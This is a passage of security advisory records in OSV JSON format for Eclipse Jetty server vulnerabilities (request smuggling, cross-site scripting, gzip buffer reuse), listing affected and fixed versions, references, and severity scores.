"9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6x9x-8qw9-9pp6/GHSA-6x9x-8qw9-9pp6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6x9x-8qw9-9pp6/GHSA-6x9x-8qw9-9pp6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7658" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535669" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6x9x-8qw9-9pp6" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41af10c4adec8d34a969abeb07fd0d6ad0c86768b751464f1cdd23e8@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9159c9e7ec9eac1613da2dbaddbc15691a13d4dbb2c8be974f42e6ae@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra6f956ed4ec2855583b2d0c8b4802b450f593d37b77509b48cd5d574@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4278" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106566" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:39Z", "nvd_published_at": "2018-06-26T17:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7vx9-xjhr-rw6h", "published": "2019-04-23T16:06:02Z", "modified": "2024-02-16T08:16:44.502362Z", "aliases": [ "CVE-2019-10241" ], "summary": "Cross-site Scripting in Eclipse Jetty", "details": "In Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client USES a specially formatted URL against the DefaultServlet or ResourceHandler that is configured for showing a Listing of directory contents.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.27.v20190403" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.26.v20180806", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-7vx9-xjhr-rw6h/GHSA-7vx9-xjhr-rw6h.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.26.v20190403" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.25.v20180904", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-7vx9-xjhr-rw6h/GHSA-7vx9-xjhr-rw6h.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.16.v20190411" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.15.v20190215", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-7vx9-xjhr-rw6h/GHSA-7vx9-xjhr-rw6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10241" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/01e004c3f7c7365863a27e7038b7f32dae56ccf3a496b277c9b7f7b6@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/464892b514c029dfc0c8656a93e1c0de983c473df70fdadbd224e09f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8bff534863c7aaf09bb17c3d0532777258dd3a5c7ddda34198cc2742@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcfb37bfba7b3d7e9c7808b5e5a38a98d6bb714d52cf5162bdd48e32@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d7c4a664a34853f57c2163ab562f39802df5cf809523ea40c97289c1@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190509-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:02:04Z", "nvd_published_at": "2019-04-22T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-84q7-p226-4x5w", "published": "2018-10-19T16:16:27Z", "modified": "2024-02-16T08:17:36.036350Z", "aliases": [ "CVE-2017-7656" ], "summary": "Jetty vulnerable to cache poisoning due to inconsistent HTTP request handling (HTTP Request Smuggling)", "details": "Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), contain an HTTP Request Smuggling Vulnerability that can result in cache poisoning.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.23.v20180228", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-84q7-p226-4x5w/GHSA-84q7-p226-4x5w.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.10.v20180503", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-84q7-p226-4x5w/GHSA-84q7-p226-4x5w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7656" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535667" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-84q7-p226-4x5w" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf4565a0b63f9c8b07fab29352a97bbffe76ecafed8b8555c15b83c6@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4278" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:24:19Z", "nvd_published_at": "2018-06-26T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-86wm-rrjm-8wh8", "published": "2020-12-02T18:28:18Z", "modified": "2024-03-10T05:31:38.566956Z", "aliases": [ "BIT-kafka-2020-27218", "BIT-spark-2020-27218", "CVE-2020-27218" ], "related": [ "CVE-2020-27218" ], "summary": "Buffer not correctly recycled in Gzip Request inflation", "details": "### Impact\nIf GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection and if an \nattacker can send a request with a body that is received entirely by not consumed by the application, then a subsequent request\non the same connection will see that body prepended to it's body.\n\nThe attacker will not see any data, but may inject data into the body of the subsequent request\n\nCVE score is [4.8 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\u0026version=3.1)\n\n### Workarounds\nThe problem can be worked around by either:\n- Disabling compressed request body inflation by GzipHandler.\n- By always fully consuming the request content before sending a response.\n- By adding a `Connection: close` to any response where the servlet does not fully consume request content.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.35.v20201120" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.34", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/12/GHSA-86wm-rrjm-8wh8/GHSA-86wm-rrjm-8wh8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-86wm-rrjm-8wh8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27218" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbbd003149f929b0e2fe58fb315de1658e98377225632e7e4239323fb@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbbd003149f929b0e2fe58fb315de1658e98377225632e7e4239323fb%40%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba4bca48d2cdfa8c08afc368a9cc4572ec85a5915ba29b8a194bf505@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba4bca48d2cdfa8c08afc368a9cc4572ec85a5915ba29b8a194bf505%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8f413dc923070919b09db3ac87d079a2dcc6f0adfbb029e206a7930@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8f413dc923070919b09db3ac87d079a2dcc6f0adfbb029e206a7930%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6a3866c02ac4446451c7d9dceab2373b6d32fb058f9085c6143de30@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6a3866c02ac4446451c7d9dceab2373b6d32fb058f9085c6143de30%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb4ca79d1af5237108ce8770b7c46ca78095f62ef21331d9d06142388@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb4ca79d1af5237108ce8770b7c46ca78095f62ef21331d9d06142388%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racf9e6ad2482cb9b1e3e1b2c1b443d9d5cf14055fb54dec3d2dcce91@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racf9e6ad2482cb9b1e3e1b2c1b443d9d5cf14055fb54dec3d2dcce91%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd55c9b704aa68cfb4436f17739b612b5d4f887155e04ed521a4b67@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd55c9b704aa68cfb4436f17739b612b5d4f887155e04ed521a4b67%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=568892" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe3f2e0a3c38ed9cbef81507b7cc6e523341865e30dc15c7503adc76%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe3f2e0a3c38ed9cbef81507b7cc6e523341865e30dc15c7503adc76@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbea4d456d88b043be86739ab0200ad06ba5a7921064411c098f79831%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbea4d456d88b043be86739ab0200ad06ba5a7921064411c098f79831@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0e35f4e8a8a36127e3ae7a67f325a3a6a4dbe05034130fb04b6f3b6%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": 